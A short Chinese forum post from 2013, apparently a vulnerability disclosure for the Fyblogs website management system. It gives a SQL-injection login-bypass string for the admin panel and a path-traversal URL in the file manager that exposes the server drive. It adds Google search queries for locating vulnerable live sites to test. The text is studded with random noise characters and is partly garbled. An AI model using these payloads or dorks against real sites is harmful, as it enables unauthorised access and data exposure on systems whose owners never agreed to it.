漏洞类型: 未授权访问/权限绕过* i1 p; J5 z$ S- \
, x. Y* B3 I* ^& [3 Y5 @4 A
简要描述:! Z0 \: c }( J$ g0 Z
- o- P3 s z' F# N+ \
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 _7 Z/ v' X! W
$ w; Q- ]. W5 |' X详细说明:
5 b7 o. a, ^( ^7 O" m3 X: B2 w. C& u+ h. E8 [: q/ C9 h; ~5 o' V
后台万能密码 'or'='or'
% Q) m% O: N" l5 q0 F( J后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
$ ^6 l/ r; g( |admin/uploadfile.asp?currentFolder=/upfiles/..// ]/ W \1 e; ~; E" k: O7 X( A
+ {" K2 Y g) `漏洞证明:
* _6 W& n" s/ Z$ q, O) n4 }9 U; m2 L/ b
谷歌:inurl:type.asp?id=1 新闻中心# q9 H. A; f" ]* J6 Y
或者 :inurl:download_ok.asp?! V2 k' E# k8 z% X7 ~
+ k' ^- n0 e; P; s可以测试
6 h2 G8 n7 _0 l/ f* n( s
4 c& i7 n3 L/ ?+ j
" `* I( Y6 D% K+ i2 O" y# Y |
发表于 2013-3-7 13:07:46
收藏
支持
反对